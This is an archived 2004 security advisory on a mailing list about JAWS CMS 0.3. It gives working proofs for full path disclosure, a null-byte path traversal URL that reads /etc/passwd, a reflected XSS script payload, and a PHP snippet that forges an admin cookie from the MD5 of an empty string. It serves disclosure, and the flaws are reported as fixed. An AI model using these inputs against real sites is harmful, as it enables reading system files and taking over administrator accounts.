lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <3213.200.21.110.32.1089098388.squirrel@webmail.gigax.org>
From: nando at gigax.org (nando@...ax.org)
Subject: Multiples vulnerabilities in JAWS

check this...

/////////////////////////////////////////////////////


////		Vulnerable Program: JAWS
////
////		Version : 0.3	; it's BETA probably ;)
////
//// 		Url: http://www.jaws.com.mx
////
//// 		The Bug: Multiples vulnerabilities
////
//// 		Date: Today, July 5 off 2004
////
//// 		Author: Fernando Quintero (a.k.a nonroot)
////       	 Email: nando@...ax.org


//////////////////////////////////////////////////////


I. Affected software description:

 Jaws is a Framework and Content Management System for building dynamic
web sites.
 It aims to be User Friendly giving ease of use and lots of ways to
customize web sites,
 but at the same time is Developer Frendly, it offers a simple and
powerful framework to hack
 your own modules. Jaws is Free Software under the GPL.


 note: to hack your own modules, to hack your own modules, to hack your
own modules... ;)


II. Bugs


There are some vulnerabilities in the jaws code, it's were fixed quickly
by your main coder.


1) Full path disclosure ...


There are many ways to determine the full path to the web root directory:


a)  http://127.0.0.1/jaws/index.php?gadget=filebrowser&path=/etc

    Specifying a variable path, that does not exist.


b)  function jaws_error($text, $file, $line)
	 {
	     print ("<b style=\"color: #f00;\" JAWS
Error:</b><br/>".$text."<br/><i> ".$text."<br/><i>".$file.",line
".$line);
         exit;
	 }

    The jaws_error() function, it returns the line and the full path to
the name of the file.


c)  http://127.0.0.1/jaws/include/config.php

    Trying to open some file in the include directory.



2) Arbitrary file browsing.


We can acceded to the file's content through the variable gadget.


http://127.0.0.1/jaws/index.php?gadget=../../../../../../../../../../etc/passwd%00&path=/etc


This line show us the passwd file.

The use of the "path" variable is irrelevant, in the code can be seen a
line like:

$path= str_replace ("..","",$path) --> at this way we filter the content
of path, but in the

index.php file the "gadget" variable is not filter.


The "%00" is necessary because the script adds at the end of the name of
"gadget" variable the extencion ".php"



3) XSS (the fashionable word)

Cross site scripting  in the variable action, because it script returns
the content of the variable:


	http://127.0.0.1/jaws/index.php?gadget=[a valid gadget]&action=<b>bold
letter</b>
	http://127.0.0.1/jaws/index.php?gadget=[a valid
gadget]&action=<script>alert('Colombia Rulx!!');</script>


In the index.php the vulnerable code is:

jaws_error ("Invalid operation: You can't display this action
[".$go_gadget->name."::".$go_gadget->action."]",__file__,__line__);


where "$go_gadget->action" content the erroneus action.


4) Validation without a password :)

There exist a way that allow us to get in the control panel with
administrator rights without a password.

The admin.php file have:


//

if ($GLOBALS["app"]->logged_on())
{
control panel code...
...
}

//

The logged_on() function is in the application.php file.

The function's code.

//

function logged_on()
    {
	return (md5($_SESSION["logged"]) ==$_COOKIE["logged"]);
    }

//


Is extrange to see this type of validation but there is!.

The $_SESSION["logged"] variable before entering the Control Panel it has
a Null ("") value.

a possible way to exploit it should be:

//BEGIN

//exploit.php
<?PHP
setcookie("logged","d41d8cd98f00b204e9800998ecf8427e",time()+86400*365,'path
to jaws');
?>

//END


Where "d41d8cd98f00b204e9800998ecf8427e" is the MD5 hash for the NULL value

This way we can create a cookie ( that look like from the remote system)
and then try the Url:

http://127.0.0.1/jaws/admin.php

and we will be inside.



III. Solution
     ????????
    The main coder was contacted and the code was fixed in the cvs ;).


IV.  Greetings

    - Greets to GIGAX people.
    - Greets All the community. I learn of you!

V.  Contact

    Fernando Quintero
    nando@...ax.org
    Medell?n-Colombia

VI. Final words

    - Sorry by the english  and  !!! Viva Colombia !!!!!!!!

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ